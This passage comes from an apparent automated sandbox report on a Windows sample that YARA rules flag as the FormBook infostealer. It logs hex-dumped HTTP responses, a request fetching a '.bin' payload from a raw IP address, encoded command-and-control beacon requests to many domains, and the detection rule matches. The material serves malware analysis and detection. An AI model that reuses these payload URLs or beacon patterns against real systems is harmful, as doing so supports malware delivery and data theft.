64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="rob
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Oct 2023 09:31:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4517Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 16 Oct 2023 09:31:30 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MpGK7yZXHWUiYzLtGfchwAQaLzfuKq2WwxungnaqY4dClZ6lkG9HFkWgqR7PcaKKJRzGf8Y5%2BTSWuo90pIrRTe%2FUdCQXbWcMIyE%2FCa44ONOFBWnb3JDYxWv7HtMUKB7OG8CJp%2FRF3wt%2FVEsalg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=7.999897Server: cloudflareCF-RAY: 816f49aff84a5220-LAXalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 16 Oct 2023 09:31:57 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 16 Oct 2023 09:31:57 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 16 Oct 2023 09:32:59 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "65271109-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 16 Oct 2023 09:34:01 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 16 Oct 2023 09:34:01 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Oct 2023 09:34:22 GMTServer: ApacheContent-Length: 302Content-Type: text/html; charset=UTF-8Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 33 35 29 3c 2f 68 33 3e 0d 0a 20 20 20 20 3c 21 2d 2d 2d 20 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 2d 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (35)</h3> <!--- 102.129.145.32---></div></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Oct 2023 09:34:22 GMTServer: ApacheContent-Length: 302Content-Type: text/html; charset=UTF-8Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 33 35 29 3c 2f 68 33 3e 0d 0a 20 20 20 20 3c 21 2d 2d 2d 20 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 2d 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (35)</h3> <!--- 102.129.145.32---></div></body></html>
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
      Source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: jU0hAXFL0k.exe, jU0hAXFL0k.exe, 00000005.00000000.2063367292434.0000000000409000.00000008.00000001.01000000.00000003.sdmp, jU0hAXFL0k.exe, 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: jU0hAXFL0k.exe, 00000005.00000000.2063367292434.0000000000409000.00000008.00000001.01000000.00000003.sdmp, jU0hAXFL0k.exe, 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: unknownDNS traffic detected: queries for: assets.msn.com
      Source: global trafficHTTP traffic detected: GET /pcd/zkltfDHOiVw63.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: 103.72.68.128Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM HTTP/1.1Host: www.juara102-azura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.fftsxxx.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g HTTP/1.1Host: www.nightoracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=Jl6D3AYJMpsoqEFrbY4lXgI+CqA8jAhhEBHBOp3JwZxwH/kCFGDnFMsoz66PDEG/ZKuf HTTP/1.1Host: www.thesoftwarepractitioner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn HTTP/1.1Host: www.laserhairremovalkit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.omarshafie.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=KT0d1e3BBcKFYE425gVaQdIZfgENHgjmY2M2c9Bsa4V4Og8kkivQcwUvXP4wlMvPRBCl HTTP/1.1Host: www.electric-cars-19095.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=tDFPqbQSWha/CSL3nrPGL7FBUiRZeUezwZrLB2afcgfzzGJsCl08dK+Vf/r9oM/AKN8c&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.latitudeinformatics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.hdlive7.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt HTTP/1.1Host: www.robertjamesfineclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=tnlFoTupmPEe2FuJuv6YyFNcBynACc4EqLKIKpHaKJfweHMHroc5yQmaieiVC2idvHp8&CZF=FZ4P3Z3Pkfe HTTP/1.1Host: www.practicaloutsource.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /rs10/?wr5xXxu=pPtLjK/UsFcChRXxT0x+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli51cvqOL5Mhkn&L0Dp=Ifmdxb8 HTTP/1.1Host: www.mtauratarnt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,5_2_0040523F

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: jU0hAXFL0k.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
